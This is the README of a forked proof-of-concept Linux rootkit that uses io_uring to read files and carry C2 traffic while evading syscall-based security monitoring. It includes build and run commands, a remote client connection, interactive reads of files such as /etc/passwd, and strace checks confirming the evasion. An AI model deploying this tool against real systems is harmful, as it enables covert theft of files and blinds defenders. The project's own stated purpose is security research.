Curing is a POC rootkit that uses io_uring to perform file operations and network communication without traditional syscalls, making it invisible to security tools that only monitor syscalls.
This enhanced version adds interactive file reading capabilities and flexible deployment options:
- 🎯 Interactive Mode: Real-time file reading with command-line interface
- 🌐 Flexible Networking: Support for custom IP addresses and ports
- ⚙️ Command-line Arguments: Override config files with CLI parameters
- 📁 Any File Access: Read any accessible file on the target system
- 🔧 Easy Deployment: Simple setup for local testing or remote operations
The original Curing project was created by amitschendel and demonstrates io_uring bypass techniques against Linux security tools. The idea was born at CCC conference #38c3.
📖 Original article: io_uring rootkit bypasses Linux security
make clean && make all# Default (localhost:8888)
./build/server
# Custom host and port
./build/server -host 0.0.0.0 -port 9999# Local connection
./build/client -interactive
# Remote connection
./build/client -interactive -host 192.168.1.100 -port 9999> /etc/passwd
> /etc/hostname
> /tmp/myfile.txt
> quit
curing/
├── cmd/ # Client application
├── server/ # Server application
├── pkg/
│ ├── client/ # Client implementation
│ ├── server/ # Server implementation
│ ├── common/ # Shared types and commands
│ └── config/ # Configuration management
├── poc/ # Original POC demonstration
└── io_uring_example/ # Simple io_uring usage example
- Quick Start Guide - 5-minute setup guide
- Original POC Demo - Falco bypass demonstration
- io_uring Example - Simple io_uring usage
- Changelog - What's new in this version
- Client connects to server using io_uring network operations
- User enters file paths interactively
- Server reads files using io_uring file operations
- Results are sent back through io_uring network operations
- No traditional syscalls are used for file access or network communication
The original mode works as a traditional C2 where the client pulls predefined commands from the server.
- ✅ Interactive file reading - Real-time file access
- ✅ Flexible networking - Custom IP/port support
- ✅ Command-line arguments - Override config files
- ✅ Remote deployment - Easy setup across networks
- ✅ Help system - Built-in usage guides
- ✅ Read files - Using io_uring file operations
- ✅ Write files - Using io_uring file operations
- ✅ Create symbolic links - Using io_uring operations
- ✅ C2 communication - Using io_uring network operations
- ❌ Execute processes - Blocked by io_uring limitations
Verify that no traditional syscalls are used:
# Monitor file operations
strace -f -e trace=openat,read,write -p $(pgrep server)
# Monitor network operations
strace -f -e trace=socket,connect,send,recv -p $(pgrep client)You should see no file or network related syscalls because everything goes through io_uring.
- Linux kernel 5.1+ (io_uring support)
- Go 1.21.6+
- Build tools (make, gcc for io_uring example)
FOR SECURITY RESEARCH AND EDUCATION ONLY
This project demonstrates io_uring bypass techniques against syscall-based security monitoring.
- ✅ Security research and education
- ✅ Testing your own systems
- ❌ Unauthorized access to systems
- ❌ Malicious activities
Users are responsible for compliance with applicable laws and regulations.
This is an enhanced fork of the original Curing project.
Enhancements in this fork:
- Interactive file reading capabilities
- Flexible networking with custom IP/port support
- Command-line argument system
- Enhanced documentation and user experience
Original project credit: amitschendel